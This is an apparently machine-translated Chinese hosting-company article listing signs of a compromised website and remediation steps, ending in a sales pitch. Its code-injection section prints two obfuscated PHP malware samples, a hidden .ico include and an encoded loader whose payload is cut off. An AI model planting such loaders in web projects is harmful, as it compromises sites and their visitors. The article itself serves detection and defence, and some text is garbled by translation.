介绍
当网站被入侵时会发生什么? 当您发现出现问题的迹象时,您能以多快的速度做出反应? 在今天的文章中,我们将探讨一些被入侵网站的常见指标,如何发现它,以及如何及时采取行动。
在当今世界,网站是您的企业、品牌、产品和服务面向世界的面向公众的代表。 这使其成为任何商业企业的重要组成部分。 您的网站对于营销、产品展示、内容创建和其他活动至关重要。 由于您的网站在您的业务中扮演着如此重要的角色,因此它是网络犯罪分子的主要目标,他们将试图利用您的服务器资源、窃取和/或加密您的数据,或者只是简单地造成严重破坏。
该网站正在重定向到另一个网站
在许多情况下,如果您的网站正在重定向到另一个网址或看起来与您的网站相似但地址栏包含不同名称的网站,则可能表明该网站已被入侵。 我们应该经常仔细检查浏览器地址栏中的网站地址,看看是否有任何可疑的标点符号、拼写错误或域名是否完全不同。 为了 example域“аррӏе.com”,可以注册为“xn–80ak6aa92e.com”,并且可以绕过仅使用西里尔字符的旧浏览器过滤器。 你可以通过点击这个来查看这个误导 概念验证 使用 Chrome, Firefox, 或者 Opera. 这种类型的攻击被定义为同形异义词攻击。 许多 浏览器 对此有内置保护,但恶意方继续有效地利用此方案。
该网站未打开您的主页
有时,受感染的网站不需要将网站重定向到远离服务器或网站的地方。 打开主页或询问联系信息时,可能会显示受感染的脚本或恶意联系表格。 让我们想象一下您的网站通常以 万维网。example.com. 有一天,您看到该站点正在拉出一个请求帐户登录的表单,该表单未包含在您的内容中,地址栏如下所示: 万维网。example.com/easfr.php. 这可以很好地表明已被注入恶意脚本或代码的受感染网站。
网站内容丢失或已更改
这种妥协很容易被检测到,并且通常通过丢失的内容或被破坏的网站很明显。 在大多数情况下,攻击者对窃取数据不感兴趣,但可能会试图强迫您支付 赎金 取回您的内容。 这种攻击是最常见的攻击之一,在许多情况下,可以通过使用备份恢复然后检查文件和目录是否有任何类型的脚本或代码注入来解决。
不受欢迎的下载
如果某个站点提示您下载文件或立即开始下载应用程序或其他软件,则可能表明该站点已被入侵。 这种方法并不总是 100% 的结论性指示,也不一定总是如此,因为它也可以反映服务器本身的技术问题。 在这些情况下,对服务器进行更详细的检查总是一个好主意,以建立明确的结论性答案。
网站打开或运行缓慢
网站加载缓慢并不是妥协的明确迹象,因为网站缓慢可能是由多种因素造成的。 话虽如此,值得审查,因为受感染的站点可能会将脚本或其他有害代码注入站点,这可能会导致服务器资源的大量消耗,并可能导致站点响应缓慢。 系统管理员可以检查这些事情,他们将分析服务器上正在运行的进程,以确定网站是否确实从服务器中提取了过多的资源。
网站报告安全警告
如果一个不知名的人发送了一个链接,我们可以使用各种安全工具或其他方法轻松地在线检查它,这些工具只需通过谷歌搜索即可。 此外,浏览器喜欢 Google Chrome 将发出警告,表明该站点可能已被入侵或以某种方式不安全。 如果您看到这样的警告,则应立即采取行动,因为妥协迫在眉睫或已经发生。
网站登录凭据不起作用
如果您登录网站的控制面板并被阻止登录,您的网站可能会受到威胁。 在这种情况下,我们首先需要确保我们用于访问网站的用户名和密码是正确的,并且没有被更改。 我们还需要验证服务器没有在防火墙中阻止我们。 如果您仍然无法登录,则攻击者很可能已经泄露了密码、登录并更改了凭据。 在这种情况下,我们应该立即检查服务器上的日志是否有任何可疑的登录、连接或来自未知 IP 的上传。
未知文件、扩展或插件
今天的许多网站主要依赖于 CMS(内容管理系统)软件,该软件依赖于各种插件来扩展功能并连接不同的功能以将附加功能合并到内容中。 如果您注意到一个不属于该站点的插件,或者您不熟悉插件的安装方式,则可能表明该站点被注入了恶意插件。 始终确保仔细检查插件的来源、它的作用以及它是如何安装在您的网站上的。
-rw-r--r-- 1 exampleuser exampleuser 224 Sep 5 01:06 wp-rss.php
-rw-r--r-- 1 exampleuser exampleuser 224 Sep 5 01:06 wp-rdf.php
-rw-r--r-- 1 exampleuser exampleuser 494 Sep 5 01:06 wp-pass.php
-rw-r--r-- 1 exampleuser exampleuser 246 Sep 5 01:06 wp-feed.php
-rw-r--r-- 1 exampleuser exampleuser 244 Sep 5 01:06 wp-commentsrss2.php
-rwx-rwx--rwx-- 1 exampleuser exampleuser 244 Sep 12 01:06 .582b546e.ico服务器被列入黑名单
一个站点在外部视图中可以表现得非常好,但在幕后,可以利用域名或 IP 从服务器发送垃圾邮件或恶意内容。 最好的方法是检查网站的名称或 IP 地址,以验证它是否被列入公共黑名单是使用 网络工具 或内部 脚本. 如果事实上该网站存在,则该网站很可能已被入侵。
网站源代码中的奇怪编码
可以通过查看源代码来检测网站上的代码注入。 网站代码可能包含试图隐藏其真实目的的奇怪编码。 如果您注意到与以下代码类似的数据,则该站点很可能遭到入侵。 话虽如此,有些软件确实使用这样的编码来完成诸如编码您不想公开的信息之类的事情,例如电子邮件地址。
<?php
/*6d55d*/
@include "�57ho155e/141dv145nt165r/160ub154ic137ht155l/167p-143on164en164/p154ug151ns�57sh141re141ho154ic�57.5�702b�6546145.i143o";
/*6d55d*/
/**或者
<?php
$_ca583z = basename/*gfjun*/(/*if4*/trim/*liq*/(/*dyk*/preg_replace/*6wtz*/(/*t0s*/rawurldecode/*z8fx*/(/*xe*/"%2F%5C%28.%2A%24%2F"/*9d*/)/*bc*/)(/*vksc*//*jr0u6*/)/*4qos*//*zruna*/)/*u9*/;$_b2euph = "GS%18%1ACQQP%0C%40%0C%07G%09FL%40%07TYi%06A%07%17%0
AVAgQ%10PUB%00%0ENJF%24N2V%07S%5DX%00%06N%10%1B%5CPY_%3DV%5BX%11K%11%170MG%5DS%16P%14%11I%0EXJT%24uQ%5C%0BjGS%11%06N%06%1D%5CZJm%0EZS%11I%0E%276%23b%1C%03r%0B%5B%5Di%16K%1DKHBZ_m%07GFY%17%5DNOO%1E%1C%03r%0B%5B%5Di%16K%1DKHCT%40m%07MQU%10Z%00%0C%01qAQ_%07%12%18%16U%07R%23
%0A%5CGW%40%3DGQF%0A%5C%1D%0A%01I%1D%08%1BYuGS%11q%1D%0A%02KjT%5B%0F%5C%40%1EU%07R%0A%09%06%14%5CW%04%5CZS%01%06K3%27~j%7D%7D.%17%1D%1F%1EJ%0C%05%06%40P%10%102%7Ddi%20a%25AC%0E%17d%5C%40%1C%0FK%0CHIKNJP%5E%5B%0CPP%1EBH%00%0F%0AqEMF%3DV%5BX%11K%07%17%1C%0E%12%11%1B%19QQP%如果我认为我的网站遭到入侵,我该怎么办?
受感染的网站可能难以解决且难以完全解决。 以下是我们可以采取的一些常见步骤来帮助修复此问题。
- 使用 Maldet 或其他防病毒软件扫描帐户中的恶意软件。
- 定期更改帐户上的所有 FTP、cPanel、MySQL 和 CMS 密码。
- 审查(或让开发人员审查)网站脚本,作为恶意软件扫描,可能并不总是 100% 确定地识别所有恶意代码。
- 删除任何旧的或未使用的脚本、插件和/或未使用的主题。
- 确保正确设置帐户的权限集。 目录权限应设置为 755,文件权限应设置为 644。
- 始终对任何原始代码执行完整性检查和同行评审。
- 将所有 CMS 和相关插件和主题更新到最新的稳定版本。
- 扫描所有本地设备(即用于访问内容或帐户的设备)以查找恶意软件、间谍软件和感染。
采取这些步骤可能看起来过于复杂或耗时,并且不能保证它们会消除或预防感染或注射。 如果您确实遇到了这样的问题,Liquid Web 在这里为您服务。 我们提供多种途径来解决此类问题,包括我们的服务器保护包服务、SSL 证书、Web 保护包以及 DDOS 保护。 这些工具和许多其他工具提高了服务器的整体安全性,并提供了对任何潜在恶意软件的清理。 让我们的安全专家每周 7 天、每天 24 小时保护您的服务器。
结论
受损网站有许多迹象和症状,其中一些比其他更容易发现。 上面的列表不是一个确定的列表,但确实包含许多您需要注意的项目。 这些症状可能表明网站受到了损害,或者有可能使您或您客户的业务面临严重风险。 即使您已采取所有必要的步骤来保护您的站点和服务器,也可能发生注入、勒索软件和恶意软件攻击。 这就是为保护您的站点和服务器而制定、有效并经过测试的可靠备份计划的原因。 这应该始终是一个优先事项! 备份是最后一种保护手段,可确保您不会成为勒索软件攻击或数据丢失的受害者。 Liquid Web 提供了多个选项来启用此功能。 应审查和实施这些选项以保持数据的完整性。
如果您在解决此类问题时遇到任何问题,或者认为您的站点或服务器可能在某种程度上受到了威胁,请立即致电 800.580.4985 联系我们,或打开 聊天 或与我们联系,与我们知识渊博的系统管理员之一交谈! 我们将查明您可能有的任何疑虑。
